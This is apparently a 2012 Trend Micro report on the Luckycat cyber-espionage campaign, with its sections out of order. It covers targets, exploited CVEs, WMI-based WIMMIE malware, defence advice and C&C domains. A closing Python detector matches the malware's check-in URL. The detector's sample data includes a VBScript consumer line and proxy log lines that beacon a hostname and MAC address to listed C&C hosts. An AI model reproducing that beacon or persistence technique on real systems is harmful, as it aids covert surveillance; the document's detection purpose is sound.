Targeted attacks are not isolated smash-and-grab incidents. They are part of consistent campaigns that aim to establish a persistent, covert presence in a target's network so that information can be extracted as needed. Targeted attacks may not be easy to understand, but careful monitoring allows researchers to leverage the mistakes attackers make to get a glimpse inside their operations. Moreover, we can track cyber-espionage campaigns over time using a combination of technical and contextual indicators.

This paper specifically discussed the Luckycat campaign. In the course of our research, we discovered that it had a much more diverse target set than previously thought. Not only did the attackers target military research institutions in India, as earlier disclosed by Symantec, they also targeted sensitive entities in Japan and India as well as Tibetan activists. They used a diversity of infrastructure as well, ranging from throw-away free-hosting sites to dedicated VPSs.

We also found that the Luckycat campaign can be linked to other campaigns. The people behind it used or provided infrastructure for other campaigns that have also been linked to past targeted attacks such as the previously documented ShadowNet campaign.[19]

Understanding the attack tools, techniques, and infrastructure used in the Luckycat campaign, as well as how an individual incident is related to a broader campaign, provides the context necessary for us to assess its impact and come up with defensive strategies in order to protect our customers.

#### DEFENDING AGAINST APTS

Sufficiently motivated threat actors can penetrate even networks that use moderately advanced security measures. As such, apart from standard and relevant attack prevention measures and mechanisms such as solid patch management, endpoint and network security, firewall use, and the like, enterprises should also focus on detecting and mitigating attacks. Moreover, data loss prevention (DLP) strategies, such as identifying exactly what an organization is protecting and taking into account the context of data use, should be employed.

##### Local and External Threat Intelligence

Threat intelligence refers to indicators that can be used to identify the tools, tactics, and procedures used by threat actors engaging in targeted attacks. Both external and local threat intelligence are crucial for developing the ability to detect attacks early. The following are the core components of this defense strategy:

- Enhanced visibility: Logs from endpoint, server, and network monitoring are an important and often underused resource. Aggregated, they provide a view of the activities within an organization that can be processed for anomalous behaviors indicating a targeted attack.
- Integrity checks: In order to maintain persistence, malware will make modifications to the file system and registry. Monitoring such changes can indicate the presence of malware.
- Empowering the human analyst: Humans are best positioned to identify anomalous behaviors when presented with a view of aggregated logs from across a network. This information is used in conjunction with custom alerts based on the local and external threat intelligence available.

Technologies available today such as Deep Discovery provide visibility, insight, and control over networks to defend against targeted threats.[20] Deep Discovery uniquely detects and identifies evasive threats in real time and provides in-depth analysis and actionable intelligence to prevent, discover, and reduce risks.

##### Mitigation and Cleanup Strategy

Once an attack is identified, the cleanup strategy should focus on the following objectives:

- Determine the attack vector and cut off communications with the C&C server.
- Determine the scope of the compromise.
- Assess the damage by analyzing the data and forensic artifacts available on compromised machines.

Remediation should be applied soon afterward. It includes steps to fortify affected servers, machines, or devices into secure states, informed in part by how the compromised machines were infiltrated.

##### Educating Employees Against Social Engineering

Security-related policies and procedures combined with education and training programs are essential components of defense. Traditional training methods can be fortified by simulations and exercises using realistic spear-phishing attempts sent to test employees. Employees trained to expect targeted attacks are better positioned to report potential threats and constitute an important source of threat intelligence.

##### Data-Centric Protection Strategy

The ultimate objective of targeted attacks is to acquire sensitive data. As such, DLP strategies that focus on identifying and protecting confidential information are critical. Enhanced data protection and visibility across an enterprise provide the ability to control access to sensitive data as well as to monitor and log successful and unsuccessful attempts to access it. Enhanced access control and logging capabilities allow security analysts to locate and investigate anomalies, respond to incidents, and initiate remediation strategies and damage assessment.

#### TREND MICRO THREAT PROTECTION AGAINST LUCKYCAT CAMPAIGN COMPONENTS

The following table summarizes the Trend Micro solutions for the components of the Luckycat campaign. Trend Micro recommends a comprehensive security risk management strategy that goes further than advanced protection to meet the real-time threat management requirements of dealing with targeted attacks.

|Attack Component|Protection Technology|Trend Micro Solution|
|---|---|---|
|HTTP C&C communication fingerprint: count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@|Web Reputation|Endpoint (Titanium, Worry-Free Business Security, OfficeScan); Server (Deep Security); Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange); Network (Deep Discovery); Gateway (InterScan Web Security, InterScan Messaging Security); Mobile (Mobile Security)|
|TROJ_WIMMIE, VBS_WIMMIE|File Reputation (Antivirus/Anti-malware)|Endpoint (Titanium, Worry-Free Business Security, OfficeScan); Server (Deep Security); Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange); Network (Deep Discovery); Gateway (InterScan Web Security, InterScan Messaging Security); Mobile (Mobile Security)|
|CVE-2010-3333, CVE-2010-2883, CVE-2010-3654, CVE-2011-0611, CVE-2011-2462|Vulnerability Shielding/Virtual Patching|Server (Deep Security); Endpoint (OfficeScan with Intrusion Defense Firewall Plug-In). For CVE-2010-3333: Rule #1004498 (Microsoft Word .RTF File Parsing Stack Buffer Overflow Vulnerability). For CVE-2010-2883: Rule #1004393 (Adobe Reader SING Table Parsing Vulnerability), Rule #1004113 (identified malicious .PDF file), Rule #1004315 (identified malicious .PDF file - 3). For CVE-2010-3654: Rule #1004497 (Adobe Flash Player Unspecified Code Execution Vulnerability). For CVE-2011-0611: Rule #1004801 (Adobe Flash Player .SWF File Remote Memory Corruption Vulnerability), Rule #1004114 (identified malicious .SWF file), Rule #1004647 (restrict Microsoft Office file with embedded .SWF file). For CVE-2011-2462: Rule #1004871 (Adobe Acrobat/Reader U3D Component Memory Corruption Vulnerability), Rule #1004873 (Adobe Acrobat/Reader U3D Component Memory Corruption)|
|cattree.1x.biz, charlesbrain.shop.co, footballworldcup.website.org, frankwhales.shop.co, hi21222325.x.gg, kinkeechow.shop.co, kittyshop.kilu.org, perfect.shop.co, pumasports.website.org, tomsburs.shop.co, vpoasport.shopping2000.com, goodwell.all.co.uk, fireequipment.website.org, tennissport.website.org, waterpool.website.org, tb123.xoomsite.com, tbda123.gwchost.com, toms.0fees.net, tomygreen.0fees.net, killmannets.0fees.net, maritimemaster.kilu.org, masterchoice.shop.co, jeepvihecle.shop.co, lucysmith.0fees.net|Web, Domain, and IP Reputation|Endpoint (Titanium, Worry-Free Business Security, OfficeScan); Server (Deep Security); Messaging (InterScan Messaging Security, ScanMail Suite for Microsoft Exchange); Network (Deep Discovery); Gateway (InterScan Web Security, InterScan Messaging Security); Mobile (Mobile Security)|

TREND MICRO INC.
10101 N. De Anza Blvd., Cupertino, CA 95014
U.S. toll free: 1 +800.228.5651; Phone: 1 +408.257.1500; Fax: 1 +408.257.2003
www.trendmicro.com

Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years' experience, we deliver top-ranked client, server and cloud-based security that fits our customers' and partners' needs, stops new threats faster, and protects data in physical, virtualized and cloud environments. Powered by the industry-leading Trend Micro™ Smart Protection Network™ cloud computing security infrastructure, our products and services stop threats where they emerge, from the Internet. They are supported by 1,000+ threat intelligence experts around the globe.

©2012 by Trend Micro, Incorporated. All rights reserved.
Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company

targeted nature of related components and techniques. Also, while cybercrime focuses on stealing credit card and banking information to gain profit, APTs are better thought of as cyber espionage.

## LUCKYCAT

### First Seen

Individual targeted attacks are not one-off attempts. Attackers continually try to get inside the target's network. The Luckycat campaign has been active since at least June 2011.

### Victims and Targets

APT campaigns target specific industries or communities of interest in specific regions. The Luckycat campaign has been linked to 90 attacks against the following industries and/or communities in Japan and India:

»» Aerospace
»» Energy
»» Engineering
»» Shipping
»» Military research
»» Tibetan activists

The threat actors behind the Luckycat campaign used a unique campaign code to track victims of specific attacks.

### Operations

The 1st-stage computer intrusions often use social engineering. Attackers custom-fit attacks to their targets.

»» Targeted emails that are contextually relevant (e.g., emails containing a decoy document of radiation dose measurement results sent some time after the Great East Japan Earthquake)
»» Exploited CVE-2010-3333 (aka the Rich Text Format [RTF] Stack Buffer Overflow Vulnerability) in several instances, although Adobe Reader and Flash Player vulnerabilities were also exploited
»» Used TROJ_WIMMIE or VBS_WIMMIE, malware that keep the backdoor logic in a Windows Management Instrumentation (WMI) event consumer rather than in a file on disk, so file scanning does not detect the backdoor component
»» The WIMMIE malware, once inside the network, connects to a command-and-control (C&C) server via HTTP over port 80
»» Attackers heavily used free web-hosting services to host their C&C servers under a diverse set of domain names but also used virtual private servers (VPSs) for more stable operations

### Possible Indicators of Compromise

Attackers want to remain undetected as long as possible. A key characteristic of these attacks is stealth. WIMMIE malware do not leave much of a network fingerprint. However, the following HTTP C&C communication fingerprint is identifiable: count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@. The same format can also be seen in the URL inside the script of the WMI event consumer, which can be listed from the WMI command line (e.g., wmic) with /namespace:\\root\subscription path __eventconsumer.

### Relationship with Other APT Campaigns
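The check-in fingerprint described under Possible Indicators of Compromise above can be turned into a detection that runs on both sides the paper mentions: web proxy logs (the HTTP check-in over port 80) and a dump of the WMI event consumers in root\subscription (the script that carries the same URL). The following is an added example written for this page, not code from the paper or from Trend Micro. It assumes that the MAC address in the URL is 12 hex digits with or without ':' or '-' separators, that the hostname contains no underscore, and that the WMI dump is a constructed key=value listing; the sample log lines, hostnames, MACs, and consumer names are invented, while the C&C domains are taken from the paper's list.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Pattern for the WIMMIE check-in URL described in the paper:
#   count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@
# Assumptions not fixed by the paper: the MAC is 12 hex digits with or
# without ':' / '-' separators, and the hostname contains no underscore.
CHECKIN_RE = re.compile(
    r"count\.php\?m=c&n="
    r"(?P<host>[^_&\s\"']+)_"
    r"(?P<mac>[0-9A-Fa-f]{2}(?:[:-]?[0-9A-Fa-f]{2}){5})_"
    r"(?P<code>[^@&\s\"']+)@",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Checkin:
    source: str          # log line number or WMI consumer name the hit came from
    host: str            # victim hostname as reported by the malware
    mac: str             # MAC normalized to lowercase, separators removed
    campaign_code: str   # the attackers' per-attack victim tag


def normalize_mac(mac: str) -> str:
    return re.sub(r"[:-]", "", mac).lower()


def find_checkins(text: str, source: str) -> List[Checkin]:
    """Return every Luckycat check-in URL embedded in `text`."""
    return [
        Checkin(source, m["host"], normalize_mac(m["mac"]), m["code"])
        for m in CHECKIN_RE.finditer(text)
    ]


def scan_proxy_log(lines: Iterable[str]) -> List[Checkin]:
    """Network side: run the fingerprint over web proxy log lines."""
    hits: List[Checkin] = []
    for number, line in enumerate(lines, start=1):
        hits.extend(find_checkins(line, f"proxy line {number}"))
    return hits


def scan_wmi_consumers(dump: str) -> List[Checkin]:
    """Host side: run the fingerprint over a dump of root\\subscription
    __EventConsumer instances. The dump layout (blank-line-separated
    key=value records) is a constructed assumption, not a fixed format."""
    hits: List[Checkin] = []
    for record in re.split(r"\n\s*\n", dump.strip()):
        name = re.search(r"^Name=(.*)$", record, re.MULTILINE)
        label = name.group(1).strip() if name else "<unnamed consumer>"
        hits.extend(find_checkins(record, f"WMI consumer {label!r}"))
    return hits


def summarize(hits: List[Checkin]) -> dict:
    """Group victims by campaign code so each hit maps to an attack wave."""
    by_code: dict = {}
    for h in hits:
        by_code.setdefault(h.campaign_code, set()).add(h.host)
    return {code: sorted(hosts) for code, hosts in by_code.items()}


# Constructed sample data (not telemetry from the paper). Domains come from the
# paper's C&C list; timestamps, client IPs, hostnames and MACs are invented.
SAMPLE_PROXY_LOG = [
    "2011-11-14 09:12:03 10.0.5.21 GET http://www.example.org/index.html 200",
    "2011-11-14 09:12:41 10.0.5.21 GET http://tomsburs.shop.co/count.php?m=c&n=FINANCE-PC_00-1C-42-9A-B3-7F_circle@ 200",
    "2011-11-14 09:13:10 10.0.5.88 GET http://www.example.org/news.html 200",
    "2011-11-14 09:14:02 10.0.5.88 GET http://lucysmith.0fees.net/count.php?m=c&n=lab03_001c429ab380_liberate@ 200",
]

SAMPLE_WMI_DUMP = """\
__CLASS=NTEventLogEventConsumer
Name=SCM Event Log Consumer
SourceName=Service Control Manager

__CLASS=ActiveScriptEventConsumer
Name=UpdateConsumer
ScriptingEngine=VBScript
ScriptText=Set o = CreateObject("Microsoft.XMLHTTP"): o.Open "GET", "http://perfect.shop.co/count.php?m=c&n=WKS-17_00:1C:42:11:22:33_aaaa@", False: o.Send
"""


if __name__ == "__main__":
    all_hits = scan_proxy_log(SAMPLE_PROXY_LOG) + scan_wmi_consumers(SAMPLE_WMI_DUMP)
    for h in all_hits:
        print(f"{h.source}: host={h.host} mac={h.mac} campaign={h.campaign_code}")
    print(summarize(all_hits))
```

The campaign code is worth extracting rather than merely matching on: the paper ties each code to one attack wave, so grouping hits by code tells an analyst which lure reached which hosts. On the host side, any ActiveScriptEventConsumer in root\subscription that is not part of a known baseline deserves review even when its script does not match this exact URL, since the fingerprint only catches the WIMMIE variants that use it.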